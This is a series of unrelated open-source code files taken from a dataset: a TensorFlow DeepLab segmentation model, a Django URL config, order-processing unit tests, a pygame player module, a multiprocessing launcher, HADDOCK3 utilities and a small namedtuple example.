fine_tune_batch_norm = True, name=\"image_level_conv_1x1\")\n\n image_level_features = tf.image.resize_bilinear(image_level_features, (feature_map_size[1], feature_map_size[2]))\n\n at_pool1x1 = self._conv2d(net, depth, 1, activation_fn=None, fine_tune_batch_norm = True, name=\"conv_1x1_0\")\n\n at_pool3x3_1 = self._conv2d(net, depth, 3, rate=rates[0], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_1\")\n\n at_pool3x3_2 = self._conv2d(net, depth, 3, rate=rates[1], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_2\")\n\n at_pool3x3_3 = self._conv2d(net, depth, 3, rate=rates[2], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_3\")\n\n net = tf.concat((image_level_features, at_pool1x1, at_pool3x3_1, at_pool3x3_2, at_pool3x3_3), axis=3, name=\"concat\")\n\n net = self._conv2d(net, depth, 1, activation_fn=None, fine_tune_batch_norm = True, name=\"conv_1x1_output\")\n net = tf.layers.dropout(net,rate=0.1,training=self.phase, name=\"dropout\")\n \n return net\n\n def _conv2d_same(self, inputs, num_outputs, kernel_size, stride, rate=1, scope=None):\n \"\"\"Strided 2-D convolution with 'SAME' padding.\n When stride > 1, then we do explicit zero-padding, followed by conv2d with\n 'VALID' padding.\n Note that\n net = conv2d_same(inputs, num_outputs, 3, stride=stride)\n is equivalent to\n net = slim.conv2d(inputs, num_outputs, 3, stride=1, padding='SAME')\n net = subsample(net, factor=stride)\n whereas\n net = slim.conv2d(inputs, num_outputs, 3, stride=stride, padding='SAME')\n is different when the input's height or width is even, which is why we add the\n current function. For more details, see ResnetUtilsTest.testConv2DSameEven().\n Args:\n inputs: A 4-D tensor of size [batch, height_in, width_in, channels].\n num_outputs: An integer, the number of output filters.\n kernel_size: An int with the kernel_size of the filters.\n stride: An integer, the output stride.\n rate: An integer, rate for atrous convolution.\n scope: Scope.\n Returns:\n output: A 4-D tensor of size [batch, height_out, width_out, channels] with\n the convolution output.\n \"\"\"\n if stride == 1:\n return self._conv2d(inputs,num_outputs,kernel_size,1,rate,'same',name=scope)\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n inputs = tf.pad(inputs,[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])\n return self._conv2d(inputs,num_outputs,kernel_size,stride,rate,'valid',name=scope) \n \n def _conv2d(self, \n\t\t\tnet,\n\t\t\tnum_o,\n\t\t\tkernel_size, \n\t\t\tstride=1,\n\t\t\trate=1,\n\t\t\tpadding='SAME',\t\t\t\n\t\t\tweight_decay=0.0001,\n\t\t\tactivation_fn=tf.nn.relu,\n\t\t\tuse_batch_norm=True,\n fine_tune_batch_norm = False,\n\t\t\tname = None):\n\t\n \"\"\"\n Conv2d + BN + relu.\n \"\"\"\n batch_norm_params = {\n 'decay': 0.997,\n 'epsilon': 1e-5,\n 'scale': True,\n 'is_training': self.phase and fine_tune_batch_norm,\n 'fused': True, # Use fused batch norm if possible.\n }\n \n net = tf.contrib.layers.conv2d(net,\n num_o,\n kernel_size,\n stride,\n padding = padding,\n rate = rate,\n activation_fn = activation_fn,\n normalizer_fn = tf.contrib.layers.batch_norm if use_batch_norm else None,\n normalizer_params = batch_norm_params,\n weights_initializer = initializers.variance_scaling_initializer(),\n weights_regularizer = tf.contrib.layers.l2_regularizer(weight_decay),\n scope = name)\n return net\n\n def _subsample(self, inputs, factor, 
scope=None):\n \"\"\"Subsamples the input along the spatial dimensions.\n Args:\n inputs: A `Tensor` of size [batch, height_in, width_in, channels].\n factor: The subsampling factor.\n scope: Optional variable_scope.\n Returns:\n output: A `Tensor` of size [batch, height_out, width_out, channels] with the\n input, either intact (if factor == 1) or subsampled (if factor > 1).\n \"\"\"\n if factor == 1:\n return inputs\n else:\n return tf.layers.max_pooling2d(inputs, pool_size = 1, strides=factor, padding='same', name=scope)\n\n def _res_stage_nonlocal(self, net, depth, stride, block_id, num_blocks, nonlocal_mod, apply_nonlocal):\n count = 0\n with tf.variable_scope('block%d' %block_id):\n for i in range(1,num_blocks+1):\n with tf.variable_scope('unit_%d' % i):\n block_stride = 2 if (i == num_blocks and stride == 2) else 1\n net = self._bottleneck_resblock(net, depth = depth, depth_bottleneck = depth//4, stride = block_stride, unit_rate=1)\n \n if (i % nonlocal_mod == nonlocal_mod - 1) and apply_nonlocal:\n net = self._nonlocal_block(net, dim_inner=depth//2, scope= 'nonlocal_%d' % count)\n count += 1\n\n return net\n\n def _nonlocal_block(self, net, dim_inner, embed = True, softmax = True, maxpool = 2, scope = None):\n '''\n Args:\n input: Input into the block. Tensor with shape (B,H,W,C)\n dim_inner: Number of bottleneck channels.\n embed: Whether or not use the \"embedding\"\n softmax: Whether or not to use the softmax operation which makes it\n equivalent to soft-attention.\n maxpool: How large of a max-pooling to use to help reduce\n the computational burden. Default is 2, use False for none.\n scope: An optional scope for all created variables.\n Returns:\n A spatial non-local block.\n '''\n with tf.variable_scope(scope):\n if embed:\n theta = tf.contrib.layers.conv2d(net, dim_inner//4, [1, 1], activation_fn=None, normalizer_fn = None, scope='theta')\n phi = tf.contrib.layers.conv2d(net, dim_inner//4, [1, 1], activation_fn=None, normalizer_fn = None, scope='phi')\n else:\n theta = net\n phi = net\n g_orig = g = tf.contrib.layers.conv2d(net, dim_inner, [1, 1], activation_fn=None, normalizer_fn = None, scope='g')\n \n # subsampling after phi and g (max pooling)\n if maxpool is not False and maxpool > 1:\n phi = tf.contrib.layers.max_pool2d(phi, [maxpool, maxpool], stride=maxpool, scope='pool_phi')\n g = tf.contrib.layers.max_pool2d(g, [maxpool, maxpool], stride=maxpool, scope='pool_g')\n \n # reshape (B,H,W,C) to (B,HW,C)\n theta_flat = tf.reshape(theta, [tf.shape(theta)[0], -1, tf.shape(theta)[-1]])\n phi_flat = tf.reshape(phi, [tf.shape(phi)[0], -1, tf.shape(phi)[-1]])\n g_flat = tf.reshape(g, [tf.shape(g)[0], -1, tf.shape(g)[-1]])\n\n theta_flat.set_shape([theta.shape[0], theta.shape[1] * theta.shape[2] if None not in theta.shape[1:3] else None, theta.shape[-1]])\n phi_flat.set_shape([phi.shape[0], phi.shape[1] * phi.shape[2] if None not in phi.shape[1:3] else None, phi.shape[-1]])\n g_flat.set_shape([g.shape[0], g.shape[1] * g.shape[2] if None not in g.shape[1:3] else None, g.shape[-1]])\n\n # Compute f(a, b) -> (B,HW,HW)\n f = tf.matmul(theta_flat, tf.transpose(phi_flat, [0, 2, 1]))\n if softmax:\n f = tf.nn.softmax(f)\n else:\n # replacing softmax with scaling by 1/N, N is the number of positions in x\n f = f / tf.cast(tf.shape(f)[-1], tf.float32)\n\n # Compute f * g (\"self-attention\") -> (B,HW,C)\n fg = tf.matmul(f, g_flat)\n # (B,HW,C) -> (B,H,W,C)\n fg = tf.reshape(fg, tf.shape(g_orig))\n\n # Go back up to the original depth, add residual, zero-init.\n # batch normalization 
after Wz\n batch_norm_params = {\n 'decay': 0.997,\n 'epsilon': 1e-5,\n 'scale': True,\n 'param_initializers': {'gamma': tf.zeros_initializer()},\n 'is_training': self.phase,\n 'fused': True,\n }\n fg = tf.contrib.layers.conv2d(fg, net.shape[-1], [1, 1], \n activation_fn=None,\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=batch_norm_params,\n scope='fg')\n \n net = net + fg\n return net\n\ndef model_fn(features, labels, mode, params):\n ''' Model function'''\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n train = True\n output_stride = params.train_output_stride\n else:\n train = False\n output_stride = params.eval_output_stride\n \n img_input = tf.reshape(features, [-1, params.crop_size, params.crop_size, 3])\n\n # Create network\n net = ResNet_segmentation(img_input, params, train, output_stride, 'res101')\n\n # predictions\n raw_output = net.outputs\n\n predictions = tf.argmax(raw_output, axis=-1)\n\n # Setup the estimator according to the phase (Train, eval)\n reduced_loss = None\n train_op = None\n eval_metric_ops = {}\n\n # compute loss(train and eval)\n loss = softmax_sparse_crossentropy_ignoring_last_label(labels,raw_output)\n\n # L2 regularization\n l2_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n\n\n # Loss function\n reduced_loss = tf.reduce_mean(loss) + tf.add_n(l2_losses)\n\n # evaluation metric\n miou, update_op = mIOU(raw_output,labels,params.num_classes,img_input)\n\n # configure training\n if mode == tf.estimator.ModeKeys.TRAIN:\n # piecewise learning rate scheduler\n global_step = tf.train.get_or_create_global_step()\n learning_rate = tf.train.piecewise_constant(global_step, params.learning_rate[0], params.learning_rate[1])\n \n # make learning rate available to TensorBoard in TRAIN modes\n tf.summary.scalar('Learning_rate', learning_rate) \n\n # SGD + momentum optimizer\n optimizer = tf.train.MomentumOptimizer(learning_rate,momentum = 0.9)\n # comment out next two lines if batch norm is frozen\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(reduced_loss, global_step=tf.train.get_or_create_global_step())\n\n if mode == tf.estimator.ModeKeys.EVAL:\n eval_metric_ops = {\n 'miou': (miou, update_op)\n }\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=reduced_loss,\n train_op=train_op,\n eval_metric_ops=eval_metric_ops,\n export_outputs=None,\n)","sub_path":"models/deeplab_v3_nonlocal.py","file_name":"deeplab_v3_nonlocal.py","file_ext":"py","file_size_in_byte":21444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39246778","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom plans import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.home, name='home'),\n path('plans/', views.plan, name='plan'),\n path('auth/', include('django.contrib.auth.urls')),\n path('auth/signup', views.SignUp.as_view(), name='signup'),\n path('join', views.join, name='join'),\n path('checkout', views.checkout, name='checkout'),\n path('auth/settings', views.settings, name='settings'),\n path('updateaccounts', views.updateaccounts, name='updateaccounts'),\n]\n","sub_path":"nickfitness/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479313011","text":"'''\nCreated on 2014-01-09\n\n@author: 
julienbacon\n'''\n\nfrom Log import Log\nfrom ProductOrder import ProductOrder\nfrom Order import Order, sourceFileDontExist, emptyOrder\nimport os\nimport unittest\n\nTEST_FILE_ROOT = r'..\\test_files'\n\ndef productOrderBuilder(prodNb, desc, qty, date, employee):\n prodOrder = ProductOrder()\n prodOrder[ProductOrder.PROD_NB_KEY] = prodNb\n prodOrder[ProductOrder.DESC_KEY] = desc\n prodOrder[ProductOrder.QTY_TO_ORDER_KEY] = qty\n prodOrder[ProductOrder.DATE_KEY] = date\n prodOrder[ProductOrder.EMPLOYEE_KEY] = employee\n return prodOrder\n \nclass OrderLoadingTest(unittest.TestCase):\n ATTENDED_RESULTS = [productOrderBuilder(u'', u'', u'200', u'13/04/1232', u''),\n productOrderBuilder(u'130050', u'coucou', None, u'13/04/1231', u'Daniel'),\n productOrderBuilder(u'133840', u'dodo', u'50', u'01/01/2001', u'justin'),\n productOrderBuilder(u'130090', u'', None, None, u''),\n productOrderBuilder(u'203432', u'bonjour', u'2000', u'01/01/2001', u'jf'),\n productOrderBuilder(u'133045', u'allo', u'100', u'01/01/2001', u'jb')]\n \n def testOrderLoading(self):\n '''\n Order must be able to load its ProductOrders from an excel file, get its\n length and pop right its whole ProductOrder list.\n '''\n log = Log()\n order = Order(log)\n order.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile1.xls'))\n result = []\n for i in range(len(order)):\n result.append(order.popRight())\n i = i\n self.assertListEqual(result, self.ATTENDED_RESULTS, 'Order failed to load its ProductOrder list from an excel file, get its length and popRight its whole ProductOrder list')\n \n def testNoOrderFile(self):\n '''\n Order must raise a sourceFileDontExist error when trying to load an order\n from a non-existent file.\n '''\n log = Log()\n order = Order(log)\n self.assertRaises(sourceFileDontExist, order.loadOrder,\n os.path.join(TEST_FILE_ROOT, 'allo.xls'))\n \n def testEmptyOrder(self):\n '''\n Order must raise an emptyOrder exception when trying to load an empty\n order file.\n '''\n log = Log()\n order = Order(log)\n self.assertRaises(emptyOrder, order.loadOrder,\n os.path.join(TEST_FILE_ROOT, 'OrderTestFile8.xls'))\n \nclass filterOlderTest(unittest.TestCase):\n ATTENDED_RESULTS = [productOrderBuilder(u'203432', u'bonjour', u'2000', u'14/01/2014', u'jf admin'),\n productOrderBuilder(u'240900', u'lala', u'100', u'14/01/2014', u'guy'),\n productOrderBuilder(u'130090', u'prout', u'200', u'14/01/2914', u'jb'),\n productOrderBuilder(u'033840', u'dodo', u'50', u'14/01/2014', u'justin')]\n ATTENDED_LOG = [u'N/A X 130050 coucou n\\'a pas ete commande a cause d\\'information incomplete.',\n u'200 X N/A N/A n\\'a pas ete commande a cause d\\'information incomplete.',\n u'100 X 133045 allo n\\'a pas ete commande a cause d\\'une commande datant de moins de 20 jours.']\n \n def testFilterOrder(self):\n '''\n Order must be able to filter and remove the bad ProductOrder and those\n already ordered.\n The filters are:\n - incomplete or incoherent ProductOrder.\n - ProductOrder already ordered in the last 20 days, unless the employee is the admin.\n '''\n log = Log()\n order1 = Order(log)\n order2 = Order(log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile2.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile3.xls'))\n order1.filter(order2)\n result = []\n for i in range(len(order1)):\n result.append(order1.popLeft())\n i = i\n self.assertListEqual(result, self.ATTENDED_RESULTS, 'Order failed to filter and remove the bad and already ordered ProductOrder.')\n \n def testFilterLogging(self):\n '''\n Order must 
log the ProductOrder that was filtered and the reason why they were\n filtered.\n '''\n log = Log()\n order1 = Order(log)\n order2 = Order(log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile2.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile3.xls'))\n order1.filter(order2)\n self.assertListEqual(log.getMsgList(), self.ATTENDED_LOG, 'Order failed to log the filtered ProductOrder.')\n \nclass clearAndSaveTest(unittest.TestCase):\n \n def setUp(self):\n '''\n Set up the test case by loading the content of the files to build the\n expected result.\n '''\n self.__log = Log()\n self.__originalFile1 = Order(self.__log)\n self.__originalFile2 = Order(self.__log)\n self.__originalFile1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile4.xls'))\n self.__originalFile2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile5.xls'))\n self.__attendedResult2 = []\n for prodOrder in self.__originalFile1.getOrderList():\n self.__originalFile2.append(prodOrder)\n self.__originalFile2.popLeft()\n for prodOrder in self.__originalFile2.getOrderList():\n self.__attendedResult2.append(prodOrder)\n \n def tearDown(self):\n '''\n Delete the new files.\n '''\n os.remove(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n os.remove(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n \n def testClearAndSave(self):\n '''\n Order must be able to clear and save (removing old orders) itself.\n '''\n order1 = Order(self.__log)\n order2 = Order(self.__log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile4.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile5.xls'))\n for i in range(len(order1)):\n order2.append(order1.popLeft())\n i = i\n order1.clear()\n order1.save(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n order2.save(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n resultOrder1 = Order(self.__log)\n resultOrder2 = Order(self.__log)\n try:\n resultOrder1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n except:\n pass\n resultOrder2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n result1 = []\n result2 = []\n for prodOrder in resultOrder1.getOrderList():\n result1.append(prodOrder)\n for prodOrder in resultOrder2.getOrderList():\n result2.append(prodOrder)\n self.assertListEqual(result1, [], 'Order failed to clear itself.')\n self.assertListEqual(result2, self.__attendedResult2, 'Order failed to save itself.')\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","sub_path":"src/OrderTest.py","file_name":"OrderTest.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476127046","text":"import pygame\r\nimport world as World\r\nimport math\r\n#player_texture, player_screen_coords, player_direction\r\n\r\nDIAGONAL_LONG = 1/(math.sqrt(2))\r\nDIR_NORTH = 0\r\nDIR_NORTH_EAST = 1\r\nDIR_EAST = 2\r\nDIR_SOUTH_EAST = 3\r\nDIR_SOUTH = 4\r\nDIR_SOUTH_WEST = 5\r\nDIR_WEST = 6\r\nDIR_NORTH_WEST = 7\r\n\r\ndef Init(screen_size):\r\n\tglobal player_move_direction, is_player_moving, player_speed, player_texture, player_screen_coords, player_direction, player_size, player_size_x, player_size_y, player_coords, player_x_coord, player_y_coord\r\n\t# initialise resources\r\n\tplayer_texture = pygame.image.load(\"../../res/textures/player/player-idle.png\")\r\n\tplayer_size = player_size_x, player_size_y = 92, 116\r\n\tplayer_screen_coords = player_x_screen_coord, 
player_y_screen_coord = (screen_size[0]-player_size_x)/2, (screen_size[1]-player_size_y)/2\r\n\tplayer_coords = player_x_coord, player_y_coord = 0.0, 0.0\r\n\tplayer_direction = [False, False, False, False, False, False, False, False]\r\n\tplayer_move_direction = DIR_NORTH\r\n\tis_player_moving = False\r\n\tplayer_speed = 0.15 # tiles/tick\r\n\r\n\r\ndef EventManager(event): # pygame event\r\n\tglobal player_x_coord, player_y_coord, is_player_moving\r\n\tif (event.key == pygame.K_UP) or (event.key == pygame.K_RIGHT) or (event.key == pygame.K_DOWN) or (event.key == pygame.K_LEFT):\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tChangeDirection(event.key, \"KEYDOWN\")\r\n\t\t\t#if event.key == pygame.K_UP:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"north\")\r\n\t\t\t#elif event.key == pygame.K_RIGHT:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"east\")\r\n\t\t\t#elif event.key == pygame.K_DOWN:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"south\")\r\n\t\t\t#elif event.key == pygame.K_LEFT:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"west\")\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tChangeDirection(event.key, \"KEYUP\")\r\n\r\n\r\ndef Move():\r\n\tglobal player_x_coord, player_y_coord\r\n\told_x, old_y = player_x_coord, player_y_coord\r\n\tif is_player_moving:\r\n\t\tif player_move_direction == DIR_NORTH:\r\n\t\t\tplayer_y_coord -= player_speed\r\n\t\telif player_move_direction == DIR_NORTH_EAST:\r\n\t\t\tplayer_y_coord -= player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord += player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_EAST:\r\n\t\t\tplayer_x_coord += player_speed\r\n\t\telif player_move_direction == DIR_SOUTH_EAST:\r\n\t\t\tplayer_y_coord += player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord += player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_SOUTH:\r\n\t\t\tplayer_y_coord += player_speed\r\n\t\telif player_move_direction == DIR_SOUTH_WEST:\r\n\t\t\tplayer_y_coord += player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord -= player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_WEST:\r\n\t\t\tplayer_x_coord -= player_speed\r\n\t\telif player_move_direction == DIR_NORTH_WEST:\r\n\t\t\tplayer_y_coord -= player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord -= player_speed*DIAGONAL_LONG\r\n\t\tx_diff = math.trunc(old_x) - math.trunc(player_x_coord)\r\n\t\tif x_diff > 0:\r\n\t\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"west\")\r\n\t\telif x_diff < 0:\r\n\t\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"east\")\r\n\t\ty_diff = math.trunc(old_y) - math.trunc(player_y_coord)\r\n\t\tif y_diff > 0:\r\n\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"north\")\r\n\t\telif y_diff < 0:\r\n\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"south\")\r\n\r\ndef ChangeDirection(key, type): # keyboard key (direction)\r\n\tmove_x = 0\r\n\tmove_y = 0\r\n\tglobal player_direction, is_player_moving, player_move_direction\r\n\tif type == \"KEYDOWN\":\r\n\t\tif key == pygame.K_UP:\r\n\t\t\tplayer_direction[DIR_NORTH] = True\r\n\t\telif key == pygame.K_RIGHT:\r\n\t\t\tplayer_direction[DIR_EAST] = True\r\n\t\telif key == pygame.K_DOWN:\r\n\t\t\tplayer_direction[DIR_SOUTH] = True\r\n\t\telif key == pygame.K_LEFT:\r\n\t\t\tplayer_direction[DIR_WEST] = True\r\n\telif type == \"KEYUP\":\r\n\t\tif key == pygame.K_UP:\r\n\t\t\tplayer_direction[DIR_NORTH] = False\r\n\t\telif key == pygame.K_RIGHT:\r\n\t\t\tplayer_direction[DIR_EAST] = 
False\r\n\t\telif key == pygame.K_DOWN:\r\n\t\t\tplayer_direction[DIR_SOUTH] = False\r\n\t\telif key == pygame.K_LEFT:\r\n\t\t\tplayer_direction[DIR_WEST] = False\r\n\r\n\tif player_direction[DIR_NORTH]:\r\n\t\tmove_y -= 1\r\n\tif player_direction[DIR_EAST]:\r\n\t\tmove_x += 1\r\n\tif player_direction[DIR_SOUTH]:\r\n\t\tmove_y += 1\r\n\tif player_direction[DIR_WEST]:\r\n\t\tmove_x -= 1\r\n\r\n\tif move_x == 0 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH\r\n\telif move_x == 1 and move_y == 0:\r\n\t\tplayer_move_direction = DIR_EAST\r\n\telif move_x == 0 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH\r\n\telif move_x == -1 and move_y == 0:\r\n\t\tplayer_move_direction = DIR_WEST\r\n\r\n\tif move_x == 1 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH_EAST\r\n\telif move_x == 1 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH_EAST\r\n\telif move_x == -1 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH_WEST\r\n\telif move_x == -1 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH_WEST\r\n\r\n\r\n\tif move_x == 0 and move_y == 0:\r\n\t\tis_player_moving = False\r\n\telse:\r\n\t\tis_player_moving = True\r\n\r\n\r\ndef Display(screen):\r\n\tglobal player_screen_coords, player_texture, player_direction, player_size, player_size_x, player_size_y\r\n\tscreen.blit(player_texture, player_screen_coords, pygame.Rect((0,player_move_direction*player_size_y),player_size))\r\n\r\ndef GetAbsoluteCoords():\r\n\tglobal player_x_coord, player_y_coord\r\n\treturn (math.trunc(player_x_coord), math.trunc(player_y_coord))\r\n\r\ndef GetDecimalCoords():\r\n\tglobal player_x_coord, player_y_coord\r\n\treturn (player_x_coord-math.trunc(player_x_coord), player_y_coord-math.trunc(player_y_coord))\r\n","sub_path":"id1.1.2/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323324617","text":"from multiprocessing import Process\nfrom multi_agent_v7 import main_multi_agent\n\nif __name__ == '__main__':\n starts = list(range(1, 2000, 1000))\n procs = []\n\n for start_index in starts:\n proc = Process(target=main_multi_agent,\n args= ('127.0.0.1:8090', '/home/ronmintz/MatrixCodeLevels/CodeLevel2/GitHubStore/gh_store2017ESX/gh.sqlite', 'users2017', start_index, 1000, 65131614))\n procs.append(proc)\n proc.start()\n\n for proc in procs:\n proc.join()\n \n","sub_path":"MatrixCodeLevels/CodeLevel3/startMultiAgent.py","file_name":"startMultiAgent.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64738735","text":"\"\"\"General utilities.\"\"\"\nimport shutil\nimport subprocess\nfrom copy import deepcopy\nfrom functools import partial\nfrom operator import ge\nfrom os import cpu_count\nfrom pathlib import Path\n\nfrom haddock import log\nfrom haddock.core.exceptions import SetupError\n\n\ncheck_subprocess = partial(\n subprocess.run,\n shell=True,\n check=True,\n stdout=subprocess.DEVNULL,\n )\n\n\ndef get_result_or_same_in_list(function, value):\n \"\"\"\n Return the result if True or the value within a list.\n\n Applies `function` to `value` and returns its result if it evaluates\n to True. 
Otherwise, return the value within a list.\n\n    `function` should receive a single argument, the `value`.\n    \"\"\"\n    result = function(value)\n    return result if result else [value]\n\n\ndef make_list_if_string(item):\n    if isinstance(item, str):\n        return [item]\n    return item\n\n\ndef copy_files_to_dir(paths, directory):\n    \"\"\"\n    Copy files to directory.\n\n    Parameters\n    ----------\n    paths : iterable of paths\n        Source files.\n\n    directory : path\n        Where to copy files to.\n    \"\"\"\n    for path in paths:\n        shutil.copy(path, directory)\n\n\ndef zero_fill(number, digits=2):\n    \"\"\"Make a number string zero-filled to the left.\"\"\"\n    return str(number).zfill(digits)\n\n\ndef remove_folder(folder):\n    \"\"\"Remove a folder if it exists.\"\"\"\n    if folder.exists():\n        log.warning(f'{folder} exists and it will be REMOVED!')\n        shutil.rmtree(folder)\n\n\ndef remove_dict_keys(d, keys):\n    \"\"\"\n    Remove `keys` from dictionary (`d`).\n\n    Return\n    ------\n    dict\n        A copy of `d` dictionary without the `keys`.\n    \"\"\"\n    return {k: deepcopy(v) for k, v in d.items() if k not in keys}\n\n\ndef parse_ncores(n=None, njobs=None, max_cpus=None):\n    \"\"\"\n    Check the number of cores according to HADDOCK3 architecture.\n\n    Parameters\n    ----------\n    n : int or str\n        The desired number of cores. If `None` is given, returns the\n        maximum number of cores allowed, see `max_cpus`.\n\n    njobs : int\n        The number of jobs to execute. Optional. The number of cores\n        will be compared to `njobs`.\n\n    max_cpus : int\n        The maximum number of CPUs allowed. If not specified, defaults\n        to the available CPUs minus one.\n\n    Raises\n    ------\n    SetupError\n        If `n` is not positive or not convertible to `int`.\n\n    Returns\n    -------\n    int\n        A correct number of cores according to specifications.\n    \"\"\"\n    max_cpus = max_cpus or max(cpu_count() - 1, 1)\n\n    if n is None:\n        return max_cpus\n\n    try:\n        n = int(n)\n    except (TypeError, ValueError) as err:\n        _msg = f\"`n` must be `int` or `int`-convertible `str`: {n!r} given.\"\n        raise SetupError(_msg) from err\n\n    if n < 1:\n        _msg = f\"`n` is not positive, this is not possible: {n!r}\"\n        raise SetupError(_msg)\n\n    if njobs:\n        ncores = min(n, njobs, max_cpus)\n        log.info(\n            f\"Selected {ncores} cores to process {njobs} jobs, with {max_cpus} \"\n            \"maximum available cores.\"\n            )\n        return ncores\n\n    log.info(f\"`njobs` not specified, evaluating initial value {n}...\")\n    ncores = min(n, max_cpus)\n    log.info(f\"Selected {ncores} for a maximum of {max_cpus} CPUs\")\n    return ncores\n\n\ndef non_negative_int(\n        n,\n        exception=ValueError,\n        emsg=\"`n` does not satisfy\",\n        ):\n    \"\"\"\n    Transform `n` to int and return it if it is non-negative.\n\n    Parameters\n    ----------\n    n : int-convertible\n        Something that can be converted to int.\n\n    exception : Exception\n        The Exception to raise in case `n` is not a positive integer.\n\n    emsg : str\n        The error message to give to `exception`. 
May accept formatting\n        to pass `n`.\n\n    Raises\n    ------\n    ValueError, TypeError\n        If `n` cannot be converted to `int`\n    \"\"\"\n    n1 = int(n)\n    if n1 >= 0:\n        return n1\n\n    # don't change to f-strings, .format has a purpose\n    raise exception(emsg.format(n))\n\n\ndef file_exists(\n        path,\n        exception=ValueError,\n        emsg=\"`path` is not a file or does not exist\",\n        ):\n    \"\"\"\n    Assert that the file exists.\n\n    Parameters\n    ----------\n    path : str or pathlib.Path\n        The file path.\n\n    exception : Exception\n        The Exception to raise in case `path` is not a file or does not\n        exist.\n\n    emsg : str\n        The error message to give to `exception`. May accept formatting\n        to pass `path`.\n\n    Raises\n    ------\n    Exception\n        Any exception that pathlib.Path can raise.\n    \"\"\"\n    p = Path(path)\n\n    valid = [p.exists, p.is_file]\n\n    if all(f() for f in valid):\n        return p\n\n    # don't change to f-strings, .format has a purpose\n    raise exception(emsg.format(str(path)))\n","sub_path":"src/haddock/libs/libutil.py","file_name":"libutil.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258747401","text":"#!/usr/bin/env python\n\"\"\"people dictionary to show off namedtuple\"\"\"\nfrom collections import namedtuple\nPERSON = namedtuple('person', 'first_name surname age pet hobbies')\n\n\ndef setup_people():\n    \"\"\"returns a dictionary of people with\n    key firstname_surname: value: namedtuple PERSON\n    that has firstname, surname, age, pet, hobbies items\n    \"\"\"\n    people = {}\n    _add_oliver(people)\n    _add_muttley(people)\n    return people\n\n\ndef _add_oliver(people):\n    \"\"\" adds oliver \"\"\"\n    new_p = PERSON(first_name='Oliver', surname='Smart',\n                   age=21, pet='Rat', hobbies=[])\n    key = new_p.first_name + '_' + new_p.surname\n    people[key] = new_p\n\ndef main():\n    \"\"\" main function run as script \"\"\"\n    people = setup_people()\n    print(people)\n\ndef _add_muttley(people):\n    \"\"\" 